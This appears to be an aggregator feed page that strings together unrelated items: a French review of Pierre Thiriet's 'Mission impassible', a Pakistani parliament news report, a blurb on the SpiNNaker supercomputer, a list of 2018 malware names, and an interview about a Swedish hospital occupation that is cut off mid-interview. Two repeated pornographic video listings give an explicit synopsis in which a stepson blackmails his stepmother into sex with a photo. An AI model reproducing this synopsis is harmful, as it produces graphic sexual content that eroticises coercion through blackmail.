Next Page: 10000

          Pierre Thiriet, les genres littéraires revisités avec le sourire      Cache   Translate Page      
mission-impassible-recto-2
Pierre Thiriet – "Mission impassible": joli titre pour un un recueil de nouvelles à vocation humoristique! Une seule lettre, et tout est transformé... On imagine que son écrivain, le journaliste Pierre Thiriet, a dû s'amuser gentiment en rédigeant, dans un esprit pince-sans-rire, les cinq nouvelles qui composent ce petit recueil. Une ligne directrice, s'il en fallait une? Avec le sourire, "Mission impassible" dépoussière quelques genres littéraires et contes anciens ou actuels. Cela, dès la première nouvelle, "Tout le monde va bien".

La narratrice de "Tout le monde va bien" est, on le découvre tout à la fin de la nouvelle, Shéhérazade. Une allusion astucieusement placée: dès le départ, l'auteur s'assure le compagnonnage de la conteuse des mille et une nuits. Tente-t-il de rivaliser avec elle? En tout cas, sa Shéhérazade est au courant de tout: la déchéance du Chat Botté, le divorce de Blanche-Neige. Il sera même question de Pierre Élelou, c'est dire: pour faire naître des sourires, l'auteur ne s'interdit pas le jeu de mots. Plus généralement, "Tout le monde va bien" démontre avec humour que, quoi qu'en disent les esprits chagrins, les personnages des contes d'autrefois sont immortels. La preuve? Aujourd'hui encore, comme personnages de récits, ils fonctionnent et vivent, indiscutablement.

Le ton est radicalement différent dans "Zen Altitude", même si l'on a à nouveau l'impression tenace que l'auteur revisite quelque chose. Ce quelque chose, c'est un conte moderne intitulé "Tintin au Tibet"! L'histoire balance un reporter, alter ego blasé de Tintin auquel il emprunte deux ou trois mots typiquement tibétains, dans l'Himalaya, de lamaserie en ermitage. L'auteur opte pour la ligne claire pour raconter: il y a de l'humour, naissant en particulier de la confrontation de visions du monde stéréotypées de part et d'autre – sachant qu'en matière de préjugés, le narrateur, pourtant supposé instruit, fait fort. Mais surtout, "Zen Altitude" est porté par une structure précise, où les horaires sont indiqués avec précision: on suit le narrateur dans une caricature de reportage à la chronologie classique et rigoureuse. Et pour faire bon poids, l'auteur réserve quelques piques à des politiciens tels que Christine Lagarde ou Jean-François Copé – invariablement de droite, allez savoir pourquoi...

On s'amuse beaucoup, aussi, lorsque l'écrivain s'aventure, avec son perpétuel sourire, dans le genre de la science-fiction. Cela donne "Anita", courte histoire d'une femme bien humaine tombant amoureuse d'un extraterrestre aux tentacules sensuels, et l'épouse – il s'appelle U36, "U" pour les intimes. Dans cette nouvelle radicalement antispéciste (l'antispécisme humain intègre-t-il la question des relations avec les extraterrestres, après tout?), l'auteur suggère un choc des cultures avant de le relativiser: après tout, dans un ménage, même composé de deux êtres d'espèces extrêmement différentes, les questions qui fâchent sont toujours les mêmes. On pense à la phrase rituelle: "C'est à cette heure-ci que tu rentres?", qui tombe avec une parfaite régularité, tout à fait attendue, en page 37.

"Ma conquête de l'ouest" revisite, on le comprend vite, cette manière de conte moderne qu'on appelle le western. S'il faut en retenir quelque chose, c'est surtout la mauvaise foi jouissive du narrateur, criminel capable, par des artifices habituels habilement agencés, d'inverser les rôles de la victime et du coupable. Pour ce coup-ci, l'auteur opte pour une construction en courts chapitres: on a affaire à un mini-roman sur quelques pages. Enfin, "La sensationnelle affaire du Dragon rouge et du Dragon noir" fait penser au roman policier et exploite gentiment un humour récurrent fondé sur les stéréotypes liés aux Chinois tels que l'Europe occidentale les voit. Cela, dans une ambiance futuriste qui ne gâche rien et permet à l'auteur de faire montre d'un supplément d'inventivité en roue libre.

En somme, "Mission impassible" s'empare de formes et des genres narratifs bien connus du lectorat d'aujourd'hui pour les subvertir en vue de faire sourire. C'est réussi, c'est fait avec finesse: le lecteur rigole volontiers, souvent de manière flûtée, mais toujours sincère. Et ça va vite: certes, Pierre Thiriet n'est pas son homonyme, le jeune pilote automobile spécialisé dans l'endurance, mais ses nouvelles sont rapides et percutantes. 

Pierre Thiriet, Mission impassible, Strasbourg/Paris, Andersen, 2017.

Le site des éditions Andersen.

          Govt, opposition come to blows in NA as PPP lawmaker terms deal with protesters a 'surrender'       Cache   Translate Page      

Members of the ruling Pakistan Tehreek-i-Insaf (PTI) and the PPP on Monday exchanged hot words and nearly got into a physical altercation after the opposition criticised the agreement reached between the government and religiopolitical groups, who protested the acquittal of Asia Bibi for three days last week.

The fracas began after PPP MNA Shazia Marri termed the deal finalised between the government and protesters as a "surrender document", and in a taunting reference to Prime Minister Imran Khan's surname (Niazi), compared the agreement to the surrender document signed by Gen A.A.K. Niazi that led to the creation of Bangladesh in 1971.

Editorial: Another surrender

Minister of State for Parliamentary Affairs Ali Muhammad Khan objected to Marri's remarks and asked her to desist from ridiculing an entire clan or tribe for an individual's act. He said it was true that Gen Niazi had surrendered before Indian troops in 1971 but there are other Niazis who are "rendering great services and sacrifices for the nation".

Speaker Asad Qaiser interjected with a warning that no member would ridicule any tribe or clan in their speeches in the future.

However, when Marri insisted she was actually mentioning the name of Gen Niazi and that she would continue to do so, a number of treasury backbenchers stood up and lodged a noisy protest to prevent the PPP lawmaker from continuing her speech.

Meanwhile, a PPP MNA from Karachi, Syed Rafiullah, and PTI's MNA from Layyah Abdul Majeed Khan exchanged some hot words.

Getting angry over some remarks uttered by Khan, which could not be heard in the galleries due to noise, Rafiullah was seen charging towards the PTI MNA, but he was physically stopped by a number of lawmakers.

The speaker called the sergeants-at-arms to expel both members from the house. However, after failing to control the situation, he adjourned the sitting till Tuesday morning.

'Govt will always defend blasphemy laws'

Earlier, Federal Minister for Religious Affairs Noorul Haq Qadri defended the government's act of entering into a deal with Tehreek-i-Labbaik Pakistan (TLP) leaders for ending their protest sit-ins over the Supreme Court verdict in Asia Bibi case.

Speaking during the session, the minister, who was a signatory to the agreement, said the government had not used force to disperse the protesters as per the desire of the opposition parties.

He said Prime Minister Khan was constantly in touch with them from China and had also instructed them to resolve the matter peacefully.

He recalled that the previous government of the PML-N had also signed a deal with the same protesters (during the Faizabad sit-in), but it was signed after three weeks and after its law minister resigned. In contrast, he said, the PTI government had succeeded in reaching an agreement in three days and without any resignation.

Qadri stressed that the PTI-led government "will always defend Section 295-C of blasphemy laws".

He said the speech of Prime Minister Khan about the establishment of writ of the state in the country was a policy and it would be implemented during its five-year tenure.

"There is a need to formulate a long-term strategy to avoid such a situation [in the future]," the minister said.

'Govt took a U-turn'

Former prime minister Shahid Khaqan Abbasi had earlier demanded that some government minister should brief the House about the agreement signed by the government with the protesters. He alleged that the government had a non-serious attitude towards important national issues.

Abbasi claimed the government had itself pointed out a lack of quorum on Friday and "ran away from the parliament".

Rana Sanaullah, another PML-N leader, said the government had handled the protest in a non-serious manner.

Without naming TLP leaders, he said these religiopolitical leaders had all of a sudden entered the political arena even though "none of them had contested even the municipality election before". He said these people were brought into politics during the by-election in NA-120, when Kulsoom Nawaz was contesting the polls, and they were later allowed to field candidates from all constituencies in the July 25 elections.

When some PTI members interrupted and asked him to identify the forces who allegedly backed the religiopolitical groups, Sanaullah said they were the same elements "who brought people from south Punjab to Banigala and into the PTI fold".

He said the agreement signed with religious groups during the PML-N government's tenure had been "forced" on them and they had not done so willingly.

Sannaullah said the opposition had suggested not to use force only at three places — Faizabad in Islamabad, The Mall in Lahore, and in Karachi — as protesters had gathered at these places in large numbers.

He said the prime minister in his speech had categorically stated that the writ of the state would be established at all costs, but in the next three days the nation saw no state or government.

"After the prime minister's speech, the government took a U-turn and entered into a deal with the protesters," the PML-N leader said.

Sanaullah also asked the government to disclose the whereabouts of Asia Bibi. "Has Asia Bibi been released as per the SC order or is she still in jail as per the agreement [with protesters]?" he asked.

He said the government had started registering cases against the protesters and there was a fear that innocent people could also be picked up in the drive.

'Opposition did not take political advantage of protests'

Earlier in the evening, Leader of the Opposition Shahbaz Sharif told PML-N lawmakers that the opposition had "not tried to take political advantage" during the crisis-like situation that had resulted from religious groups' countrywide protests against the acquittal of Asia Bibi last week.

Opposition leader Shahbaz Sharif chairs a meeting of PML-N's parliamentary party. — PML-N Twitter
Opposition leader Shahbaz Sharif chairs a meeting of PML-N's parliamentary party. — PML-N Twitter

Sharif, who is currently in the custody of the National Accountability Bureau (NAB), was chairing a meeting of PML-N's parliamentary party at the Parliament House.

The PML-N president deferred his address to the National Assembly today and is now expected to address the House tomorrow.

According to a series of tweets by the PML-N, Sharif during the meeting briefed party members on the steps that helped in improving the law and order situation in the country during the past few days.

Also read: Fawad Chaudhry thanks PPP, PML-N for 'maturity' in supporting govt over handling of protests

"[Sharif] briefed party members on the positive role played by the opposition during recent sit-ins," the party said in a tweet.

He claimed that although the Pakistan Tehreek-i-Insaf (PTI) had exploited occasions like these for "political gains", the current opposition prioritised national interest instead of doing politics on the issue.

The PML-N president was also quoted as saying that the PTI government had gained nothing from Prime Minister Imran Khan's visit to China this week.

In a statement issued, PML-N spokesperson Marriyum Aurangzeb said the meeting had taken stock of the overall political, economic and internal security situation of the country and deliberated upon a strategy for the future.

The PML-N members also criticised as an "unparliamentary act" the adjournment of the session on Friday after a lawmaker pointed out lack of quorum five minutes after it started.

"The way the government ended the session in such a sensitive situation by pointing out the [lack of] quorum shows the government lacks the ability and courage to deal with challenges," the statement read.

The adjournment of Friday's NA session considerably irked the opposition, which had already expressed its disappointment a day earlier over Prime Minister Khan's absence from the Lower House at a time when the country was facing nationwide protests by religious groups.

Soon after a recitation from the Holy Quran, Agha Hassan of the Balochistan National Party (Mengal) had pointed out lack of quorum. Deputy Speaker Qasim Khan Suri subsequently ordered a head count and then adjourned the session till Monday after finding that the quorum was not complete.

The opposition later used the adjournment of the assembly as a pretext to refuse a meeting with a government delegation that had requested bipartisan support for a parliamentary resolution against the protesters.

'No economic vision'

The meeting expressed concerns over the state of the economy, saying the government has "no economic vision or strategy" to deal with the crisis-like situation.

"The increasing economic instability and uncertainty could have... serious implications for the national security," the party said.

"Economic, agricultural, commercial and industrial activities are witnessing gradual decline which could become the harbinger of an economic disaster."

It was decided during the meeting that the PML-N will issue a fact sheet on the PTI government's performance of first 100 days and "inform the people about the details of the current government's failures".

The meeting also condemned complaints and reports of media censorship in the country, saying: "The PML-N considers freedom of press an essential pre-requisite to strengthen democracy."

Shahbaz's arrival

Ahead of Monday's session that began at 5pm, a NAB team brought Shahbaz to Parliament House, where he held a meeting with former NA speaker Ayaz Sadiq, PML-N's Sindh representative Shah Muhammad Shah and MNA Kheal Das regarding matters related to the party's reorganisation across the country.

According to PML-N party sources, Sharif also met his lawyer Amjad Pervaiz with his team during which the ongoing NAB cases against him were discussed. The PML-N president, whose physical remand is to end day after tomorrow, consulted his lawyer about their future strategy.


          Le débit de la fibre multiplié par 100 d’ici deux ans !      Cache   Translate Page      
Un composant miniaturisé et à faible coût permet d’exploiter le moment angulaire orbital d’un signal lumineux, et ainsi de grandement booster le débit de transmission d’une fibre optique.
          Dix petites anarchistes      Cache   Translate Page      

14€

Roman (broché). Paru en 10/2018

Dix petites anarchistes


Daniel de Roulet

Suisse, fin du XIXe siècle. À Saint-Imier, on vivote entre misère et exploitation, entre les étables et une industrie horlogère encore balbutiante. La visite de Bakounine, plein de l’ardeur de la Commune de Paris, éveille l’idée qu’une autre vie est possible. Dix jeunes femmes font le pari insensé de bâtir, à l’autre bout du monde, une communauté où régnerait « l’anarchie à l’état pur ». Valentine, dernière survivante des « dix petites anarchistes », nous fait le récit de cette utopie en acte qui les conduit de Suisse en Patagonie jusqu’à Buenos Aires, en passant par l’île de Robinson Crusoé. L’extraordinaire épopée de femmes soudées par un amour farouche de la liberté, qui ont choisi de « se réjouir de l’imprévu sans perdre la force de s’insurger ».

Daniel de Roulet, né à Genève, se consacre à l’écriture après l’architecture, l’informatique et le marathon. Il est l’auteur de nombreux romans et chroniques, dont sept aux éditions Buchet/Chastel.


» Télécharger 9,99€

          Worst malware and threat actors of 2018 so far      Cache   Translate Page      

What’s the worst malware so far into 2018? The worst botnets and banking trojans, according to Webroot, were Emotet, Trickbot, and Zeus Panda. Crysis/Dharma, GandCrab, and SamSam were the worst among ransomware. The top three in cryptomining/cryptojacking were GhostMiner, Wanna Mine, and Coinhive.

And included in the list of top 10 threat actors so far this year, we find Lazarus Group, Sofacy and MuddyWater coming in the top three spots, according to AlienVault. Lazarus Group took the top spot from Sofacy this year. The reported locations for the top 10 threat actors are North Korea, with two groups; Russia, with three groups; Iran, with two groups; China, with two groups; and India, with one. Microsoft Office was the most exploited application, but Adobe Flash, WebLogic, Microsoft Windows, Drupal and GPON routers were also listed in the top 10.

To read this article in full, please click here


          SpiNNaker : un supercalculateur qui émule le cerveau humain      Cache   Translate Page      

Construit par l'Université de School of Computer Science de Manchester, SpiNNaker est le plus grand supercalculateur neuromorphique au monde. Il est conçu et construit pour fonctionner de la même manière que le cerveau humain. Il vient d'être équipé de son millionième cœur de processeur emblématique et il a été mis sous tension pour la première fois vendredi 2 novembre 2018.

La nouvelle architecture "Spiking Neural Network Architecture" ou "SpiNNaker ", dotée d'un million de processeurs, est en mesure de réaliser plus de 200 millions de millions d'actions par seconde, chacune de ses puces comportant 100 millions de transistors.

Le projet a nécessité 15 millions de livres de financement, 20 ans de conception et plus de 10 ans de construction. SpiNNaker peut modéliser plus de neurones biologiques en temps réel que toute autre machine de la planète.

Les neurones biologiques sont des cellules cérébrales de base présentes dans le système nerveux qui communiquent principalement en émettant des "pics" d'énergie électrochimique pure. L'informatique neuromorphique utilise des systèmes informatiques à grande échelle contenant des circuits électroniques pour imiter ces pointes dans une machine.

SpiNNaker, contrairement aux ordinateurs traditionnels, ne communique pas en envoyant de grandes quantités d'informations du point A au point B d'un un réseau standard. Au lieu de cela, il imite l'architecture de communication massivement parallèle du cerveau, envoyant des milliards de petites quantités d'informations simultanément vers des milliers de destinations différentes.

Steve Furber, professeur en génie informatique, à l'origine de l'idée initiale d'un tel ordinateur, explique: "SpiNNaker repense complètement le fonctionnement des ordinateurs classiques. Nous avons essentiellement créé une machine qui fonctionne plus comme un cerveau qu’un ordinateur traditionnel, ce qui est extrêmement excitant.

L'objectif ultime du projet a toujours été de créer un million de cœurs dans un seul ordinateur pour les applications de modélisation du cerveau en temps réel, et nous l'avons maintenant atteint, ce qui est fantastique."

L'objectif final est de modéliser jusqu'à un milliard de neurones biologiques en temps réel et les cheurcheurs sont maintenant plus proches. Pour donner une idée de l’échelle, un cerveau de souris est constitué d’environ 100 millions de neurones et le cerveau humain est 1000 fois plus gros que cela.

Un milliard de neurones correspond à 1% de l'échelle du cerveau humain, qui comprend un peu moins de 100 milliards de cellules du cerveau, ou neurones, qui sont tous fortement interconnectés via environ 1 quadrillion de synapses 

L'une de utilisations fondamentales de SpiNNaker est d'aider les neuroscientifiques à mieux comprendre le fonctionnement de notre cerveau. Pour ce faire, il exécute des simulations en temps réel à très grande échelle, ce qui n’est tout simplement pas possible sur d’autres machines.

Par exemple, SpiNNaker a été utilisé pour simuler un traitement en temps réel de haut niveau dans une gamme de réseaux cérébraux isolés. Cela comprend un modèle de 80 000 neurones d'un segment du cortex, la couche externe du cerveau qui reçoit et traite les informations provenant des sens.

Il a également simulé une région du cerveau appelée ganglions de la base - une zone affectée par la maladie de Parkinson, ce qui signifie qu'elle présente un potentiel énorme en percée neurologique en science, comme les tests pharmaceutiques.

La puissance de SpiNNaker a récemment été exploitée pour contrôler un robot, le SpOmnibot. Ce robot utilise le système SpiNNaker pour interpréter les informations visuelles en temps réel et naviguer vers certains objets tout en ignorant les autres.

Le professeur Furber ajoute:"Les neuroscientifiques peuvent désormais utiliser SpiNNaker pour percer certains des secrets du fonctionnement du cerveau humain en exécutant des simulations à grande échelle sans précédent. Il fonctionne également comme un simulateur de neurones en temps réel qui permet aux robotiques d’intégrer des réseaux de neurones à grande échelle dans des robots mobiles afin qu’ils puissent marcher, parler et se déplacer avec souplesse et faible consommation."

Catégorie actualité: 
Image actualité AMP: 

          [PureTaboo.com] India Summer (To Catch a Cheater / 06.11.2018) [MILF & Mature, Older / Younger, Step Mom, Family Roleplay, Cheating, Exploitation, Step son, 720p, HDRip]      Cache   Translate Page      
<div class="post-align" style="text-align: center;">To Catch a Cheater


Имя актрисы: India Summer
Название ролика: To Catch a Cheater
Подсайт и сайт: PureTaboo.com
Год производства: 2018 г.
Жанр: MILF & Mature, Older / Younger, Step Mom, Family Roleplay, Cheating, Exploitation, Step son
Продолжительность: 00:47:04
Описание:
SCENE OPENS on the interior of a car, where loving husband Joe in the driver's seat has just pulled to a stop and put on his blinkers. He leans his arm casually against the window-frame, his wedding ring noticeable on his propped-up hand, and he turns to look lovingly at his wife in the passenger's seat. Vanessa (India Summer) has pulled down the passenger's visor and is applying a retouch of her make-up using the visor mirror, but shoots a glance and a smile at her husband as he turns to look at her. Joe asks if she's sure she doesn't want him to drive her the rest of the way, he really doesn't mind. Vanessa says 'Oh, no, honey! That's so sweet, but you have a lot of work to get done. I'll be OK, it's just a few more blocks to walk from here.' Vanessa finishes applying her makeup but is still fixated on the mirror, flouncing her hair to look just right. In any case, she says, she doesn't know how long this meeting is going to last so he probably shouldn't wait up for her. He should go out for a bit, have some fun with the boys. Joe is disappointed, saying that his son, Danny, is coming for dinner that night. Vanessa gasps, saying that she can't believe she's going to miss Danny again! Joe sighs and says it's okay and that she'll just have to meet him next time. Joe leans over for a kiss after wishing her good luck for the day, but she steps out of the car without acknowledging him. From a wide flat perspective outside the passenger's side of the car, we see Vanessa step out of the car and close the door. Elegant and purposeful, she slowly walks towards the camera. As the car pulls away, Vanessa looks back for a moment, then forward again, looking straight towards (or past) the camera. With a subtle smile, she continues walking, and as she gets closer we clearly see her hold her hand out in front of her and remove her wedding ring from her finger.
CUT TO TITLE PLATE
Vanessa arrives at a house entranceway and rings the bell. A young male teenager (Dustin Daring) answers the door. She looks him up and down, and says 'You must be Danny,' before nonchalantly walking past him into the house. He closes the door behind him, then takes a picture with her since his friends would never believe he's getting with such a hot piece. She asks if he's 18, and he says yes - he points back out of the room and says he can show her his license if she doesn't believe him. She says no, it's fine, she believes him. She stands in the hallway but with a nosey curiosity starts looking around through the open areas of the house. She says it's a pretty nice place, and asks if it's his parents' house. The teen says no, he doesn't live with his parents, he's renting it with some roommates. They're not home right now. 'So what do I call you?' Danny asks. She tells him he doesn't need to call her anything, they're just here to have some fun and then she'll never see him again. They go into his bedroom and she pushes him to the bed. She begins taking off her heels and he asks if it's the first time she ever used the dating site. He says that it is for him, though his buddy uses the website and ended up with a married woman! She's not married, is she? Vanessa says that it's complicated. Danny is worried about what her husband will think. She says he doesn't know about it, it's better for a marriage to have a couple of secrets. The teen corrects her, better for her, she means. She rolls her eyes, what does he care? He's the one fucking a married woman, so he can cool it with the ethics lesson. Is he going to fuck her or not? 'Oh, I'm going to fuck you, Vanessa,' Danny says while taking off his shirt. Vanessa is shocked as she sees a family picture of Danny and Joe on the shelf, putting two and two together. She tells Danny that this isn't what it seems and that he can't possibly understand! Danny tells her that he's going to send the picture of them to his dad so that he can see how big of a whore she is, going around to young strange men's houses discreetly behind his back. Vanessa tries to bargain with and seduce him, telling Danny that she sees what this is -- he just wants to fuck his step-mother. He tells her that she's pathetic, but that she'd better get down on her knees and suck his dick. Vanessa, never wanting that picture to see the light of day, slowly sinks down to her knees as the cougar becomes prey to the catfish.

Доп. Информация:
Агрегатор ссылок PureTaboo
Тип HD видео: 720p
Качество видео: HDRip
Формат видео: MP4
Видео: MPEG4 Video (H264), 1280x720, 23.976fps, 2087kbps
Аудио: AAC, 44100Hz, 2 channels, 192kbps</div>
Screenshots
</div>
Screenlisting
</div>
Категория: Зарубежные порноролики
          [PureTaboo.com] India Summer (To Catch a Cheater / 06.11.2018) [MILF & Mature, Older / Younger, Step Mom, Family Roleplay, Cheating, Exploitation, Step son, 400p, SD]      Cache   Translate Page      
<div class="post-align" style="text-align: center;">To Catch a Cheater


Имя актрисы: India Summer
Название ролика: To Catch a Cheater
Подсайт и сайт: PureTaboo.com
Год производства: 2018 г.
Жанр: MILF & Mature, Older / Younger, Step Mom, Family Roleplay, Cheating, Exploitation, Step son
Продолжительность: 00:47:04
Описание:
SCENE OPENS on the interior of a car, where loving husband Joe in the driver's seat has just pulled to a stop and put on his blinkers. He leans his arm casually against the window-frame, his wedding ring noticeable on his propped-up hand, and he turns to look lovingly at his wife in the passenger's seat. Vanessa (India Summer) has pulled down the passenger's visor and is applying a retouch of her make-up using the visor mirror, but shoots a glance and a smile at her husband as he turns to look at her. Joe asks if she's sure she doesn't want him to drive her the rest of the way, he really doesn't mind. Vanessa says 'Oh, no, honey! That's so sweet, but you have a lot of work to get done. I'll be OK, it's just a few more blocks to walk from here.' Vanessa finishes applying her makeup but is still fixated on the mirror, flouncing her hair to look just right. In any case, she says, she doesn't know how long this meeting is going to last so he probably shouldn't wait up for her. He should go out for a bit, have some fun with the boys. Joe is disappointed, saying that his son, Danny, is coming for dinner that night. Vanessa gasps, saying that she can't believe she's going to miss Danny again! Joe sighs and says it's okay and that she'll just have to meet him next time. Joe leans over for a kiss after wishing her good luck for the day, but she steps out of the car without acknowledging him. From a wide flat perspective outside the passenger's side of the car, we see Vanessa step out of the car and close the door. Elegant and purposeful, she slowly walks towards the camera. As the car pulls away, Vanessa looks back for a moment, then forward again, looking straight towards (or past) the camera. With a subtle smile, she continues walking, and as she gets closer we clearly see her hold her hand out in front of her and remove her wedding ring from her finger.
CUT TO TITLE PLATE
Vanessa arrives at a house entranceway and rings the bell. A young male teenager (Dustin Daring) answers the door. She looks him up and down, and says 'You must be Danny,' before nonchalantly walking past him into the house. He closes the door behind him, then takes a picture with her since his friends would never believe he's getting with such a hot piece. She asks if he's 18, and he says yes - he points back out of the room and says he can show her his license if she doesn't believe him. She says no, it's fine, she believes him. She stands in the hallway but with a nosey curiosity starts looking around through the open areas of the house. She says it's a pretty nice place, and asks if it's his parents' house. The teen says no, he doesn't live with his parents, he's renting it with some roommates. They're not home right now. 'So what do I call you?' Danny asks. She tells him he doesn't need to call her anything, they're just here to have some fun and then she'll never see him again. They go into his bedroom and she pushes him to the bed. She begins taking off her heels and he asks if it's the first time she ever used the dating site. He says that it is for him, though his buddy uses the website and ended up with a married woman! She's not married, is she? Vanessa says that it's complicated. Danny is worried about what her husband will think. She says he doesn't know about it, it's better for a marriage to have a couple of secrets. The teen corrects her, better for her, she means. She rolls her eyes, what does he care? He's the one fucking a married woman, so he can cool it with the ethics lesson. Is he going to fuck her or not? 'Oh, I'm going to fuck you, Vanessa,' Danny says while taking off his shirt. Vanessa is shocked as she sees a family picture of Danny and Joe on the shelf, putting two and two together. She tells Danny that this isn't what it seems and that he can't possibly understand! Danny tells her that he's going to send the picture of them to his dad so that he can see how big of a whore she is, going around to young strange men's houses discreetly behind his back. Vanessa tries to bargain with and seduce him, telling Danny that she sees what this is -- he just wants to fuck his step-mother. He tells her that she's pathetic, but that she'd better get down on her knees and suck his dick. Vanessa, never wanting that picture to see the light of day, slowly sinks down to her knees as the cougar becomes prey to the catfish.

Доп. Информация:
Агрегатор ссылок PureTaboo
Качество видео: SD
Формат видео: MP4
Видео: MPEG4 Video (H264), 720x400 (16:9), 23.976fps, 824kbps
Аудио: AAC, 44100Hz, 2 channels, 128kbps</div>
Screenlisting
</div>
Категория: Зарубежные порноролики
          An Occupy Movement in Sweden: Interview with Bosse Kramsjo, a participant      Cache   Translate Page      

Sweden, an amazing economy to many utopians or to the naive about capitalism, is experiencing pains capitalist economies feel. The capitalist crisis has already torn down that façade of the utopia. Ordinary citizens in Sweden are seeing the dream demolished. It is being manifested into politics, into electoral processes in Sweden. At the same time, ordinary citizens are trying to stand against deceptions that all varieties of bourgeoisie politics practice. 

The Occupy Movement, in many forms, illuminates areas in regions far away from the heart it originated. The Occupy Movement also shows that people initiate actions in areas and at times, the mainstream abandons them. 

Farooque Showdhury: There is a movement going on. Please, tell us about it and its background.

Bosse Kramsjo: Sweden is organised in three levels: government with ministries taking care of national issues, regional level (20 landsting or regions) taking care of, among other issues, health, and municipality level (290 municipalities) responsible for compulsory education, care of the elderly and many local level issues. The three levels have democratic elections at the same time every fourth years. In the election held in September 2014, the Social Democratic Party, together with the minor Green Party, formed a majority leading the Region of Västernorrland (comprising the municipalities of Sundsvall, Ånge, Timrå, Härnösand, Kramfors, Sollefteå and Örnskoldsvik, about 500 km north of the capital). 

The Social Democratic Party was having a stronghold in this part of Sweden (around 40-50 percent in most of these municipalities). There are three hospitals within the region; distances from each other are quite vast. The regional main hospital is in Sundsvall while smaller units are in Örnsköldsvik and Sollefteå. Before the 2014 election, the Social Democrats promised to keep all the three hospitals with their full capacity. 

However, after the election, it was decided to shut down the maternity ward and the emergency surgery in Sollefteå. Without an emergency surgery facility, you cannot have a maternity ward. This was a betrayal to all the voters around the Sollefteå hospital, mainly voters from the municipalities of Sollefteå and Kramfors as they had cast their votes to safeguard the future of the nearby safe health care facility. Delivery cases were directed to the maternity ward in Sundsvall, 130-200 km away for the inhabitants of Sollefteå municipality. This deceit was the main cause of the process, leading to a movement by organising rallies, campaigning and a 24/7 occupation of the entrance of the hospital in Sollefteå since 30 January 2017.

The uninterrupted Occupation Movement plans to continue until the emergency and maternity wards are re-opened. There are four shifts of the Occupation Movement: 07.00-12.00, 12.00-16.00, 16.00-20.00 and the over-night shift 20.00-07.00. At least five participants join every shift at daytime; during the nightshifts, it is sometimes five participants, and sometimes it comes down to three to four participants. 

During daytime, participants talk over cups of coffee while some female members carry with needlework, crocheting or knitting. Quite often friends or workmates join, and sit together. Sometimes it is colleagues having a meeting while occupying. Sometimes, people from clubs or societies join the occupy protesters. At times, a family brings their children; and if it is during the nightshifts, it turns out like a camping experience for the children. 

During the nightshifts, it is some talks to start with, then, watching TV news, and then preparing the inflatable beds for the night. When a shift follows another, there is some talks/gossip among the participants of the two shifts.

According to Swedish law, every citizen irrespective of income level or place of residence has the right to equal health care. Those who defend the decision to close down the hospital in Sollefteå opine that the treatment in Sundsvall is superior and that distance is a minor problem. Those against the shutdown decision claim that three full-fledged hospitals were promised during the election campaign. Moreover, the long distance is a vital problem for childbirth; and it is against the law.

Another important part of the background is the on-going process of centralisation in the Swedish economy, which is going on for decades. Marginalised municipalities in the north are with meagre employment opportunities due to heavy mechanisation in forestry and mining. These municipalities have an ever-increasing elderly population pyramid, high costs for municipalities and low inflow of tax (around 27-34 percent of an ordinary employee’s income goes to municipality tax to cover the municipality service costs; the richer municipality has the lower tax, and the poorer municipality has the higher tax). 

Big companies within hydropower, forestry and mining sectors do not pay taxes in the municipality although these companies in the area exploit the rivers, timber or ore. These companies pay tax in Stockholm or overseas. Therefore, it is natural resources being exploited in the marginalised parts of the country, but very little return from these companies to the local societies. The same goes for big scale investment in wind-power over the last few years. All these are in the marginalised parts of the country while income generated from the marginalised parts goes to the centre.

The same is the government presence in the marginalised parts as well. The centralisation of government presence has been going on for long; some municipalities have no government presence at all. That has been cut off. No Employment Service Office, no Social Insurance Office, no Tax Office. The feeling of being left behind by the government policies is prevalent in the marginalised parts, no matter which political party you sympathise with.  

There is a government distribution system between rich municipalities and poor municipalities. A minor part of income of the rich municipalities is forwarded to marginalised ones. This had led to an urban view declaring the marginalised municipalities as dependent and draining, being looked down upon by the big city citizens. However, the marginalised parts would like to have their fair share of all that is produced in their localities, instead of small subsidies from the rich cousins. They ask the stiff-lipped urbanites: Where do you get electricity from (hydropower and wind power)? Your steel? Your paper and stationary? Your construction timber?

It is also very provoking, from a marginalised point of view, when the maternity ward in Sollefteå is closed due to budget cuts, some per mille of the total regional health budget (15.8 million SEK [US $ 1,7 million] a year as total cost for the Sollefteå maternity ward) although enormous investment are being made in the new Karolinska Institutet, a mega-hospital in Stockholm. There, through that hospital-investment, billions of SEK have been flowing into pockets of domestic and foreign construction firms; golden and extremely costly consultant contracts have been signed; and a flow of over-priced equipment have been supplied by entrepreneurs. All these were praised by new-liberal leaders in the Stockholm region, as they are serving their profit hunting supporters rather than the health needs of the citizens.

FS: How was the 24/7 Occupy Movement organised?

BK: It was organised not by any political party, but by concerned and deceived citizens. Leadership of the movement came often with vast professional experience from the health sector. Over time, national as well as regional level party leaders have visited the movement. The Leftist and feminist ones were promising to re-open the closed down parts of the hospital, and the neo-liberal ones were going for privatisation with the scope of the same kind of re-opening.

FS: Why this sort of movement?

BK: As the majority of the region, Social Democrats and Green Party, deceived their voters, ordinary people did this to safeguard their legal right to health care.

FS: What achievement has this movement made so far?

BK: As mentioned above, many party professionals have visited and made promises in favour of Sollefteå hospital. The Social Democratic Party in the nearby municipalities of Sollefeå and Kramfors is supporting the movement, against the will of the regional and national levels of the party. We had an election on 9 September 2018. In the regional election, the Social Democrats and the Green Party were heavily punished by the voters; decreasing their mandate a lot. The parties promising to re-open the Sollefteå hospital full-fledged increased their mandate. However, it will take time, before the new setting of the political leadership of the region is in action. It is visible that the movement definitely had an important influence.

FS: What is the strength of this movement?

BK: The engagement of ordinary people, which is not a traditional party-driven affair, is one of the strengths of the movement. The leadership of the movement is versed in health related economy and administration. The Occupy Movement is continuing; it will be two years by this January2019. This persistence is very important. There was lots of support from individuals, organisations, etc. from all over the country. The Occupy Movement, many identify it as sit-in, is well known. Television teams from a number of European countries including the British Broadcasting Corporation have visited the Occupy Movement. Their purpose was mainly to report about a Swedish welfare programme cracking as many praised the Swedish welfare system for decades. A Russian media team was there to report; their conclusion was that the welfare crumbled due to the immigration. Depending on ideology, you can find any kind of cause.

FS: And, weakness?

BK: Many of the occupants are senior (a majority of citizens in the northern inland municipalities). So far, some 2,800 different individuals have occupied the position. Many are doing it on regular basis (like Maria and myself, one night 20.00-07.00 every fortnight), some are occupying several times a week. Many supporting a full-fledged hospital do not take part in the Occupy Movement/sit-in. They might find it too “political”; they have never taken part in action-oriented stands. They probably feel shy and think that you have to be skilled at arguing, if you take active part. Thousands of cars in the region have stickers saying, “I support Sollefteå hospital”; in shops and in companies you see posters expressing the same support.

Another weakness is, of course, that none of the big political parties (neither at national nor at regional level) is supporting the re-opening of the full-fledged hospital. However, that itself is the main reason for the creation of the movement.

FS: How are you trying to overcome the weaknesses?

